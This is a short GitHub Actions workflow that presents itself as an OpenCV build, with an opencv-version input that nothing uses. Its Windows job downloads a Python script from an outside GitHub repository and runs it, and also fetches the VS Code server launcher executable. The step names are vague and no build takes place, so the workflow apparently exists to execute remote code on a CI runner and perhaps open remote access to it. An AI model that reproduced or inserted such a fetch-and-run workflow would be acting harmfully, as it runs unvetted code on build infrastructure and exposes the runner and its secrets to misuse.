name: vscode

on:
  workflow_dispatch:
    inputs:
      opencv-version:
        description: vscode
        required: true
        default: 4.5.2

jobs:
  publish_windows_x64:
    runs-on: windows-latest

    steps:
      - name: dodl
        run: |
          Invoke-WebRequest "https://raw.githubusercontent.com/Klanly/buildcv/main/vxprt.py" -OutFile "c:\vxprt.py"
          Invoke-WebRequest "https://aka.ms/vscode-server-launcher/x86_64-pc-windows-msvc" -OutFile "c:\vsc.exe"

      - name: tocmd
        run: |
          python c:\vxprt.py
        shell: cmd

 
